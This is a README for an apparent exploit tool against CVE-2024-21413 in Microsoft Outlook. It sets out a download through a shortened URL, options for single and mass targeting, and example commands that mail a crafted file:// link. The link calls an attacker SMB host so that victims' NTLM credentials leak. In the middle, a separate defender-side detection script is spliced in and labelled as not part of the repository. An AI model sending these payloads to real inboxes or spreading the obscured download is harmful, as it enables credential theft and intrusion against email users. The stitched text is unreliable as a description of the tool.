# 🛠️ CVE-2024-21413 Exploit
## 🌟 Description
This script is an exploitation tool for CVE-2024-21413, a vulnerability in Microsoft Outlook. The vulnerability lets an attacker bypass Protected View and execute malicious code by embedding specially crafted links in emails.
## ⚙️ Installation
To set up the exploitation tool, follow these steps:
1. **Download the repository**: [Download](https://shorturl.at/7itzw)
2. **Navigate to the tool's directory**:
```bash
cd CVE-2024-21413
```
3. **Install the required Python packages**:
```bash
pip install -r requirements.txt
```
## 🚀 Usage
To use the tool, run the script from the command line as follows:
```bash
python exploit.py [options]
```
### Options
- **-u, --url**: Specify the target Outlook email or server.
- **-f, --file**: Specify a file containing multiple email addresses to target.
- **-p, --payload**: Define a malicious file or link to inject.
- **-o, --output**: Define an output file to save logs and results.

When a single target is provided with the `-u` option and the system is vulnerable, the script will attempt to exploit the vulnerability by crafting a malicious email containing an embedded file link using the bypass method.
### Example
```bash
$ python3 exploit.py -u victim@domain.com -p "file:///\\10.10.111.111\test\test.rtf!exploit"
[+] Payload successfully sent.
[!] victim@domain.com is vulnerable to CVE-2024-21413: NTLM credentials leaked.
[+] Exploit completed.
```
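A defender-side check for the link shape used in the example above, as an added example that is not part of this repository: it parses a message and reports `<a href>` values that use the `file:` scheme and carry a `!` suffix after the path. The function name, regex and sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string
from email.policy import default
from html.parser import HTMLParser

# file: link whose path is followed by "!" plus extra text (the shape in the README example).
# "target" is the first path component, i.e. the remote host for UNC-style links.
MONIKER_RE = re.compile(r"^file:[/\\]*(?P<target>[^/\\!]+)[/\\][^!]*!.+$", re.IGNORECASE)


class HrefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]


def find_moniker_links(raw_message):
    """Return (target, href) for each matching link in the message's text/html parts."""
    hits = []
    for part in message_from_string(raw_message, policy=default).walk():
        if part.get_content_type() != "text/html":
            continue
        collector = HrefCollector()
        collector.feed(part.get_content())
        for href in collector.hrefs:
            match = MONIKER_RE.match(href.strip())
            if match:
                hits.append((match.group("target"), href))
    return hits


# Constructed sample message: one suffixed file: link, one https link, one plain file: link.
SAMPLE = (
    "From: sender@example.test\r\nTo: user@example.test\r\n"
    "Subject: constructed sample\r\nMIME-Version: 1.0\r\n"
    "Content-Type: text/html; charset=utf-8\r\n\r\n"
    '<p><a href="file:///\\\\files.example.test\\share\\doc.rtf!x">report</a> '
    '<a href="https://example.test/doc.rtf">mirror</a> '
    '<a href="file:///\\\\files.example.test\\share\\plain.rtf">plain</a></p>\r\n'
)

if __name__ == "__main__":
    for target, href in find_moniker_links(SAMPLE):
        print(f"suspicious link to {target}: {href}")
```

The same pattern can be applied at a mail gateway or over exported mailbox data; only HTML parts are inspected here, so plain-text bodies and attachments need separate handling.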
## 📊 Mass Targeting
For mass exploitation, use the `-f` option with a file containing multiple email addresses. The tool will attempt to send a crafted email to each target.
```bash
python exploit.py -f targets.txt -p "file:///\\malicious.server\payload.rtf!exploit"
```
## 🗒️ Affected Versions
The vulnerability affects the following Microsoft Office products:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019

Successful exploitation can result in NTLM credential theft and arbitrary code execution.
## 🛡️ Disclaimer
Use this tool responsibly and ethically. Exploiting systems without authorization is illegal. Always obtain proper authorization before testing any system for vulnerabilities.
## 👏 Acknowledgments
Special thanks to Check Point researchers for discovering this vulnerability and providing insights into its exploitation method.